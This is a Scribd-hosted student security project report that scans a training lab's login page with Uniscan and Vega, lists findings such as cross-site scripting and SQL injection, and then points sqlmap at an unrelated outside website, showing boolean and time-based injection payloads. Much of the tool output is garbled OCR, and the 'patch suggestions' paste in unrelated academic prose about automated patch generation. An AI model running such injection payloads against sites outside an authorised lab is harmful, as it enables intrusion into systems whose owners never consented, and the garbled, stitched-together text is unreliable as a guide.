Scribd
Upload
93 views21 pages

Vulnerability Analysis Report

1. The document discusses using tools like Uniscan and Vega to analyze vulnerabilities on a website login page. Uniscan found 10 internal links while Vega found issues like cross-site scripting and SQL injection. 2. SQLmap was used to grab the 'flag' by targeting the id parameter on another website found in the original URL. 3. Suggestions are provided to patch the security issues, including always setting the secure cookie flag and providing explanatory patches to make bug reports more actionable.

Uploaded by

Chintapally Aditya Sameer Sharma
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
93 views21 pages

Vulnerability Analysis Report

1. The document discusses using tools like Uniscan and Vega to analyze vulnerabilities on a website login page. Uniscan found 10 internal links while Vega found issues like cross-site scripting and SQL injection. 2. SQLmap was used to grab the 'flag' by targeting the id parameter on another website found in the original URL. 3. Suggestions are provided to patch the security issues, including always setting the secure cookie flag and providing explanatory patches to make bug reports more actionable.

Uploaded by

Chintapally Aditya Sameer Sharma
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 21

Verzeo Minor

Project
MadebyGauravPrasad
Q1.) Find out the vulnerability of
https://lab.hackerinside.xyz/login.php ?

Ans1.) For testing the vulnerability of the given URL, I have


used uniscan for it. The vulnerability of
https://lab.hackerinside.xyz/login.php is >=1.32.
q a u r a v /m ka li: -

.ootokali:/home/gatiavé urizcar -t kttpz:/%lab.kackeriraice.xyz/logir.pkp -cwecz

ga u r a v /m ka li: -
b*UL I-je:tie- :

qa u r a v inka li: -

é Uriscan project é
é kttQ:..’/’LFiñCar. ñOLñCñfOñ#ñ.F'ñt/é
I-I '-' L .• - ?''?' .•: ‹°: °-° -': i -° .• - ?'.?' .• °.

Domair: kttp://kttpa:/
Use of ur ir it ializeo &’aloe ir ›orpac k at /t>r/>kare/umiscar./Ur inca- /F'nct ions. pm lir.e é2.

uae of uni.itialized value in unpark at /usz/shaze/unisran/unisran/Funrtions.pm line 62.

t{'••L :•e?'-':•t 2'...'e': i-: :•e?:':•t..--- tt? : . - tel


gaurav cukati: -

EU

E+J
E+J EU EU

EU EU E+J E+J

E+J E+J E+J

EU E+J E+J

E+J
EU E+J

E+J
UniscanReport:-
Thereare10inurlpresentinthegivenURLsite.Theyare:-
1.) http://nuelacoid.com/
2.) http://www.na.gov.pk/
3.) http://https:/
4.) http://breakthesecurity.cysecurity.org/
5.) http://www.icdcprague.org/
6.) http://ecqa.org/
7.) http://romanianwriters.ro/
8.) http://testphp.vulnweb.com/
9.) http://sneaindia.com/
10.) http://www.sneaindia.com/

Q2.) Check out the vulnerability


of https://lab.hackerinside.xyz/login.php ?

Ans2.) For checking the vulnerability of the given URL, I have


used Vega tool for it. We can see that
https://lab.hackerinside.xyz/login.php has 5 major and 1 low level
exploitation vulnerability.

The5majorexploitationvulnerabilityare:-
1.) Cross Site Scripting
2.) MYSQL Error Detected – Possible SQL Injection
3.) Session Cookie without HttpOnly Flag

4.) Session Cookie Without Secure Flag


5.) SQL Injection (https://lab.hackerinside.xyz/login.php )
TheMinorexploitationvulnerabilityis:-

1.) Form Password Field With Autocomplete Enabled

Request Report Response:-


Vegaexploitationvulnerabilityreport:-
Q3.) Grab the ‘flag’?

Ans3.) For grabbing the flag I have used sqlmap, and taken
https://www.sneaindia.com/index.php?id=1 as it was present in the
above the URL of https://lab.hackerinside.xyz/login.php/ .

.
t ! j beg at d i sc la i ver : Usag e c I s q1 nap I ci at ta ch i rrg ta rg e ts wi I fiou t p r i o r nu t ua I c ori se ri I is il beg at . i I is the e rio us ct ’ s re sp o ris ib i I i I}' to o b e} at I ap p I i cab ie I o ca I
, state a nd *eder at I acs . Dec ct o pe rs as s: n e no I tab i I i ty and a re n o t res po nsi bl e Ior a n ' n is use o r da z at e can se d b y t h i s pro Mr a o

[*] sturting E 90:18:56 /2020-05-2T/

[ [ tes Cing connec li on to the target UkL


E chec k ing i f the target is pzotec t ed by sone k ind o f wAry1 Ps

J[ J target URL content is stable


J J testing i' GET parameter ’ic’ is dynamic
[ [ heur i s li E f basic } Cest shows that GET parameter ' id ' might be inj ec I ab I e ( pa ss i bI e DaIsS : ' I \ySgL ' }
t jt j h eur is ti c (OSS} te s I sh ozs I h at GET pa r anet e r ’ i d ' ni ght be v ul n er ab1e tn cr oss -s it e s cr i pt in g ( OSS ) at I ac As
[ J[ J testing for sqL injection on sET parameter ’ic’
looks like the bach-eud DBM5 is 'Ny5QL'. Do you waut to ship test payloads specific for other DBM5es7 {Y/ul n

[ GET pa ranet er ' i d ' ap pe a rs I a be ' AN D boo ie an- ba sed b I ind - W8ERE or 8AVI 8 G c\ a use ' in j e c Eab\ e (wi I h -- s or In g=” Se I ec I I he font h and Y e ar " )
Fz zaetu : i MT)
T §E : #00fE3F- ñ3SEO ñf in

Pzy\oao : id•1 AND 6219=6219

lype: t inc- based bl ir c


Title: MySQL ? 5.J.12 AND tins-b ›et bTiro (0u£ry SLLEF!
Pzylo o: id.1 AND (S£L£CT 8?V LR09 (SELECT(SL££f(i!! t0Gi
[ ! ? let at d i seta i me r : U say e o I, c;1ina p •o - at I ac k in g ta rd ct s » i th ou I pr i or i u t ua1 c on sun I i s i thy at . lt i s the end u se r ’ s re sp on s i b i I i ty I o obey all a pp I i ca b1 e I o cal
, s ta te a nd I ede rat Ians . D o ve I o ner s a s sun e no I tab i I i t y a nd a re n ot re sp on s i b ie 'o r an y o i su se o r da cage cau se d n y I b i s p re g ran

1 J [ J resuminC Oack-end DBNS ’’r..ql ’


l] [] testiuy conuect*eu te the taryet uRL
sqlmap resumed the followzn; zr›jectzon poznt( a) from stored aeaaion:

[ I he b ac k - en d D B H 5 i s 8 y5qL

do you want to store ta shes to a ten porart f il e for eventual f ur tter prove ss ing Pitt otter tool s [y/N]
do you want to rrack ther v iz a dirt ionary -based attark* [Y/n/q]

Suggestion to the patch of this bug:-


1.) Whenever creating the cookie in the code, set the
secure flag true.

2.) The patches can suggest inserting code not present in


the original program. This is the first algorithm we are
aware of that produces patches, from bug reports. A
demonstration that our algorithm increases the
usefulness Off-the-shelf bug-finding tools that find
defects in large programs. We present experimental
evidence to show that including such patches makes
bug reports more likely to be addressed. We conclude
that patches should be included in bug reports in
practice.

3.) A textual patch is then created to represent the


differences between the original program and the
modified program. This patch may suggest the inclusion
of new code that was not in the original program. The
patch comes with a guarantee that applying it will not
introduce any new errors along paths unrelated to the
reported violation with respect to the given safety policy.
The patch is used as a starting point for understanding
and addressing the problem. We present experiments
demonstrating that bug reports that also contain
explanatory patches are more likely to be addressed in
practice. In our experiments, bug reports with patches
were three times as likely to be addressed. We believe
that the ultimate purpose of bug-finding tools and
software model checkers is to increase the quality of
software by getting bugs fixed. Our patch generation
algorithm works with most software bug-finding tools and
serves as a generic post-processing step that makes it
more likely that the bugs they find will actually be
addressed. These enriched bug reports make it easier for
maintainers to address defects.

You might also like